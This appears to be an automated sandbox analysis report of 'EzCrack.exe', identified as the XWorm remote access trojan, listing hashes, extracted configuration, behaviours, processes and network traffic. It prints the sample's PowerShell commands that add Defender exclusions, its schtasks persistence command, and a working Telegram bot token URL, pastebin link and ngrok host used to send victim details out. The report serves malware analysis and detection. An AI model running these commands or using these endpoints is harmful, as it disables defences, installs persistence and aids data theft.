Analysis

  • max time kernel
    132s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240508-en locale:en-us os:windows10-2004-x64 system
  • submitted
    03/06/2024, 16:13 UTC

General

  • Target

    EzCrack.exe

  • Size

    78KB

  • MD5

    9efc872f4f99869fd6befd84076b1f02

  • SHA1

    6bb6931b260936082028812f079f5b4543e599e0

  • SHA256

    4e8aad0b31678291ca4b4dae74385c6a0d424b7c49a439f045573f93908a764c

  • SHA512

    cfc949b9db32db43a9f0ab9dd5c59624999c8df84aaeb953251198958a10dd744e273f560f4b16cd150c5bff1d66e6014f198ca0ea3f85e5afe189fe78e8c381

  • SSDEEP

    1536:dRNd9tEnU5G+eiIhLK7AiVqbDoxTBH/d1Pq63FBN77OCXnG73E:drdARhLIVqbDSH/dVPN3OCXGDE

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %Temp%

  • install_file

    ApplicationFrameHost.exe

  • pastebin_url

    https://pastebin.com/raw/gf3CpGLZ

  • telegram

    https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\EzCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\EzCrack.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\EzCrack.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'EzCrack.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3236
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ApplicationFrameHost.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2496
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ApplicationFrameHost" /tr "C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe"
      2⤵
      • Creates scheduled task(s)
      PID:4616
  • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:908
  • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:2300

Network

  • flag-us
    DNS
    183.142.211.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.142.211.20.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    23.62.61.160:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Mon, 03 Jun 2024 16:13:31 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.443d3e17.1717431211.274c979c
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    23.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    160.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    160.61.62.23.in-addr.arpa
    IN PTR
    Response
    160.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-160.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    ip-api.com
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com/line/?fields=hosting
    EzCrack.exe
    Remote address:
    208.95.112.1:80
    Request
    GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 03 Jun 2024 16:13:32 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-api.com
  • flag-us
    DNS
    pastebin.com
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    pastebin.com
    IN A
    Response
    pastebin.com
    IN A
    104.20.4.235
    pastebin.com
    IN A
    172.67.19.24
    pastebin.com
    IN A
    104.20.3.235
  • flag-us
    GET
    https://pastebin.com/raw/gf3CpGLZ
    EzCrack.exe
    Remote address:
    104.20.4.235:443
    Request
    GET /raw/gf3CpGLZ HTTP/1.1
    Host: pastebin.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Mon, 03 Jun 2024 16:13:38 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    cache-control: max-age=1800, must-revalidate
    pragma: no-cache
    expires: Sat, 26 Jul 1997 05:00:00 GMT
    CF-Cache-Status: EXPIRED
    Last-Modified: Mon, 03 Jun 2024 16:13:37 GMT
    Server: cloudflare
    CF-RAY: 88e0f8b90b887689-LHR
  • flag-us
    DNS
    api.telegram.org
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9
    EzCrack.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 03 Jun 2024 16:13:39 GMT
    Content-Type: application/json
    Content-Length: 498
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    235.4.20.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    235.4.20.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.tcp.eu.ngrok.io
    EzCrack.exe
    Remote address:
    8.8.8.8:53
    Request
    5.tcp.eu.ngrok.io
    IN A
    Response
    5.tcp.eu.ngrok.io
    IN A
    3.67.112.102
  • flag-us
    DNS
    102.112.67.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    102.112.67.3.in-addr.arpa
    IN PTR
    Response
    102.112.67.3.in-addr.arpa
    IN PTR
    ec2-3-67-112-102.eu-central-1.compute.amazonaws.com
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 23.62.61.160:443
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    tls, http2
    1.5kB
    6.4kB
    17
    13

    HTTP Request

    GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

    HTTP Response

    200
  • 208.95.112.1:80
    http://ip-api.com/line/?fields=hosting
    http
    EzCrack.exe
    310 B
    347 B
    5
    4

    HTTP Request

    GET http://ip-api.com/line/?fields=hosting

    HTTP Response

    200
  • 104.20.4.235:443
    https://pastebin.com/raw/gf3CpGLZ
    tls, http
    EzCrack.exe
    910 B
    5.9kB
    12
    11

    HTTP Request

    GET https://pastebin.com/raw/gf3CpGLZ

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9
    tls, http
    EzCrack.exe
    1.4kB
    7.2kB
    13
    11

    HTTP Request

    GET https://api.telegram.org/bot7330774245:AAFjajgEdSRi37pBSVsgsnILKxiBDZzP_f4/sendMessage?chat_id=5561074001&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A67025772215575DC0DFC%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V6.9

    HTTP Response

    200
  • 3.67.112.102:11061
    5.tcp.eu.ngrok.io
    EzCrack.exe
    2.2kB
    1.8kB
    29
    37
  • 8.8.8.8:53
    183.142.211.20.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    183.142.211.20.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    23.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    23.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    160.61.62.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    160.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    EzCrack.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    pastebin.com
    dns
    EzCrack.exe
    58 B
    106 B
    1
    1

    DNS Request

    pastebin.com

    DNS Response

    104.20.4.235
    172.67.19.24
    104.20.3.235

  • 8.8.8.8:53
    api.telegram.org
    dns
    EzCrack.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    235.4.20.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    235.4.20.104.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    5.tcp.eu.ngrok.io
    dns
    EzCrack.exe
    63 B
    79 B
    1
    1

    DNS Request

    5.tcp.eu.ngrok.io

    DNS Response

    3.67.112.102

  • 8.8.8.8:53
    102.112.67.3.in-addr.arpa
    dns
    71 B
    136 B
    1
    1

    DNS Request

    102.112.67.3.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log

    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    35967cf5ed9a95ec4fe527dd96567a02

    SHA1

    6a7439c241a30ec540d5d204e02a4cbb2a464737

    SHA256

    4394552922777081d43fb523126cf176d5a676602a5435713320942034f6b3cf

    SHA512

    419b3c336a67ef964bc166d1267cea146ed5878f98304d6e39fb9a3c0394d75693810a9ddc101cdda5e3196ad7d603df01a3260705cf9ef7cf8d4b252df01f45

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    7a451cd1316d70a65910773fee8c3a43

    SHA1

    d2db32d5037153dd1d94565b51b5b385817a3c3d

    SHA256

    862d25ed22075f3d1f5e8d29a3c6e050dc91e53a4dc653c3f0f7c627a12ee26c

    SHA512

    60887f795036fbd6d25234c17dab4463a8a02f576ae8c07dd7b4c4ff1dba35f99b7301139ea051a7a80fdfc9e003a2f0c2dd0d444a82ecf87a3df21507332aa6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    3e242d3c4b39d344f66c494424020c61

    SHA1

    194e596f33d54482e7880e91dc05e0d247a46399

    SHA256

    f688037cb0c9f9c97b3b906a6c0636c91ad1864564feb17bba4973cde361172e

    SHA512

    27c1cd6d72554fdce3b960458a1a6bd3f740aa7c22a313a80b043db283a224bf390648b9e59e6bdbf48020d082d728fbde569bee4ee2a610f21d659a7b3dfa02

  • C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

    Filesize

    78KB

    MD5

    9efc872f4f99869fd6befd84076b1f02

    SHA1

    6bb6931b260936082028812f079f5b4543e599e0

    SHA256

    4e8aad0b31678291ca4b4dae74385c6a0d424b7c49a439f045573f93908a764c

    SHA512

    cfc949b9db32db43a9f0ab9dd5c59624999c8df84aaeb953251198958a10dd744e273f560f4b16cd150c5bff1d66e6014f198ca0ea3f85e5afe189fe78e8c381

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5u10viu.5dw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
